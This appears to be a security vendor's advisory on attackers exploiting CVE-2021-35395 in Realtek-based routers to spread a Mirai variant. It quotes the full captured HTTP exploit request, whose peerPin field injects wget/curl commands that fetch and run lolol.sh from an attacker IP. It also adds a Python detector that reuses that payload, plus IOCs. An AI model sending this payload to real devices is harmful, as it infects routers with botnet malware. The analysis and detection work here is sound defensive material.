On August 16th, three days ago, multiple vulnerabilities in a software SDK distributed as part of Realtek chipsets were disclosed by IoT Inspector Research Lab [1]. The vulnerabilities allow attackers to fully compromise and take control of affected devices. Just yesterday, only two days after the publication, our home security solution, Secure Home, detected attempts to exploit these vulnerabilities to spread a variant of the Mirai malware.

One of the vulnerabilities disclosed, CVE-2021-35395 [2], affects the web interface that is part of the SDK, and is a collection of 6 different vulnerabilities. As of August 18th, we have identified attempts to exploit CVE-2021-35395 in the wild.

Specifically, we noticed exploit attempts to “formWsc” and “formSysCmd” web pages. The exploit attempts to deploy a Mirai variant detected in March by Palo Alto Networks [3]. Mirai is a notorious IoT and router malware circulating in various forms for the last 5 years. It was originally used to shut down large swaths of the internet but has since evolved into many variants for different purposes [4].

Same attacker – different incidents

A similar incident was reported two weeks ago, on August 6th, by Juniper Networks [5]. A newly discovered vulnerability was then exploited in the wild only 2 days after publication to spread the same Mirai variant.

The webserver serving the Mirai botnet uses the same network subnet, indicating that the same attacker is involved in both incidents.

This chain of events shows that hackers are actively looking for command injection vulnerabilities and use them to propagate widely used malware quickly. These kinds of vulnerabilities are easy to exploit and can be integrated quickly into existing hacking frameworks that attackers employ, well before devices are patched and security vendors can react.

SAM’s security research group tracks published exploits and quickly blocks them using IoT virtual patching (read our recent article to learn more). The above vulnerabilities were blocked within a day of publication, protecting any potentially vulnerable device.

Affected devices

According to the original research, the vulnerable Realtek SDK is used by more than 65 vendors in more than 200 devices. According to SAM's own research of connected devices, based on anonymously collected network data spanning more than 2M home and business networks, the following are the most common devices running the Realtek SDK:

  • Netis E1+ extender
  • Edimax N150 and N300 Wi-Fi router
  • Repotec RP-WR5444 router

These devices are used mainly to enhance Wi-Fi reception.

Full Attack Details

The attack originated from 31.210.20[.]100. However, we expect the attacker's IP addresses to change over time.

The full attack payload:

POST /goform/formWsc HTTP/1.1
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Dark

submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;cd /tmp; wget http://212.192.241.87/lolol.sh; curl -O http://212.192.241.87/lolol.sh; chmod 777 lolol.sh; sh lolol.sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=
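The request above is a textbook command injection: the peerPin field, which should hold an 8-digit WPS PIN, carries a semicolon followed by shell commands that fetch and run a dropper. The following is an added example (not SAM's code and not part of the original post) of how a defender can flag such requests on the wire: it parses a raw HTTP request, splits the form body on "&" only (so the injected ";" characters are not mistaken for field separators), flags shell metacharacters in fields sent to the two Realtek SDK endpoints named in this post, and checks any download host found in the injected string against the IP addresses from the IOC list below. The benign request is constructed for the example; the malicious one is the request shown above.

```python
"""Detect command-injection attempts against the Realtek SDK web interface.

Added example for this post, not SAM's code. The benign request below is
constructed; the attack request is the one captured in the post.
"""
import re
from urllib.parse import unquote_plus

# Endpoints of the Realtek SDK web server that the observed exploit attempts hit.
TARGET_PATHS = {"/goform/formWsc", "/goform/formSysCmd"}

# Characters that let a form value break out into a shell command.
SHELL_META = re.compile(r"[;|&`]|\$\(")

# Attacker infrastructure from the post's IOC list (defanging brackets removed).
IOC_IPS = {"31.210.20.100", "212.192.241.87"}

# IPv4 hosts that an injected download command points at.
URL_HOST = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})")


def parse_http_request(raw):
    """Split a raw HTTP request into (method, path, headers, body)."""
    raw = raw.replace("\r\n", "\n")
    head, _, body = raw.partition("\n\n")
    lines = [ln for ln in head.splitlines() if ln.strip()]
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body.strip()


def split_form_body(body):
    """Split an x-www-form-urlencoded body on '&' only.

    The injected payload contains ';', which older parsers also treat as a
    field separator; splitting on it would chop the command string into
    fragments that each look harmless.
    """
    pairs = []
    for field in body.split("&"):
        if not field:
            continue
        name, _, value = field.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def analyze_request(raw):
    """Return a finding dict for an injection attempt against a target path, else None."""
    method, path, headers, body = parse_http_request(raw)
    if path not in TARGET_PATHS:
        return None
    findings = []
    for name, value in split_form_body(body):
        if not SHELL_META.search(value):
            continue
        hosts = sorted({m.group(1) for m in URL_HOST.finditer(value)})
        findings.append({
            "parameter": name,
            "value": value,
            "download_hosts": hosts,
            "known_ioc": [h for h in hosts if h in IOC_IPS],
        })
    if not findings:
        return None
    return {
        "method": method,
        "path": path,
        "user_agent": headers.get("user-agent", ""),
        "findings": findings,
    }


# The exploit request captured in the post, used here as detection input.
OBSERVED_ATTACK = (
    "POST /goform/formWsc HTTP/1.1\n"
    "Connection: close\n"
    "Content-Type: application/x-www-form-urlencoded\n"
    "User-Agent: Dark\n"
    "\n"
    "submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;cd /tmp; "
    "wget http://212.192.241.87/lolol.sh; curl -O http://212.192.241.87/lolol.sh; "
    "chmod 777 lolol.sh; sh lolol.sh;&setPIN=Start+PIN&configVxd=off"
    "&resetRptUnCfg=0&peerRptPin="
)

# Constructed benign WPS form submission carrying a plain 8-digit PIN.
BENIGN_REQUEST = (
    "POST /goform/formWsc HTTP/1.1\n"
    "Connection: close\n"
    "Content-Type: application/x-www-form-urlencoded\n"
    "User-Agent: Mozilla/5.0\n"
    "\n"
    "submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678&setPIN=Start+PIN"
    "&configVxd=off&resetRptUnCfg=0&peerRptPin="
)

if __name__ == "__main__":
    for label, req in (("observed attack", OBSERVED_ATTACK), ("benign", BENIGN_REQUEST)):
        print(label, "->", analyze_request(req))
```

Run against the captured request, the checker reports one finding on peerPin, extracts 212.192.241.87 as the download host and marks it as a known IOC; the benign submission produces no finding. On a gateway or IDS, a match on a target path plus a shell metacharacter in any field is a reliable block-and-alert condition regardless of which dropper URL the attacker rotates to next.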


IOCs

IP addresses – 31.210.20[.]100, 212.192.241[.]87

Files

Filename     SHA-256
dark.x86     a3ee4bd2f330bf6939cb9121f36261e42f54ffc45676120216fd8da4cb52036a
dark.mips    9dfaa2e60027427c9f1ff377ad3cd3bc800b914c4b9ea5e408442d25f475dab9
dark.mpsl    24d6cd113c9ddf49cb6140d2cc185f2cc033170ac27e2c352d94848cc449c312
dark.arm4    caa8b10057fb699d463f309913d0557462e8b37afdaf4d0c3cff63f9b9605f0d
dark.arm5    fd7da924fe743d2e09b10f4e8a01230f7bc884ae14ef0e6133e553de118a457e
dark.arm6    0c734c8c0f8e575a08672d01fc5a729605b3e9dbb4d0c62bd94ad86d2c3d6aeb
dark.arm7    85b07054472bbaa06d0611dfb28632ffa351d3b13e37b447914f49a1dfe07dc4
dark.ppc     a5478d51a809aed51d633611371c105e3ec82490f9516d186e7013dabcf8c77f
dark.m68k    bf9d92666d3b25cf6e49234472a2fa515107eb6df07f4aee6deb6a42eed4fa92
dark.sh4     16787be5e8d7de5816d590efb4916c7415f458bc7059d2d287715fb3ef8e0783
dark.86_64   67a655d4360cfe0ca5db17c6486f3dfbca1c82c2af4bc1f2019cee68199108c7

———————————————————————————————————————————————-

Sources

[1] www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/

[2] nvd.nist.gov/vuln/detail/CVE-2021-35395

[3] unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/

[4] en.wikipedia.org/wiki/2016_Dyn_cyberattack

[5] blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild
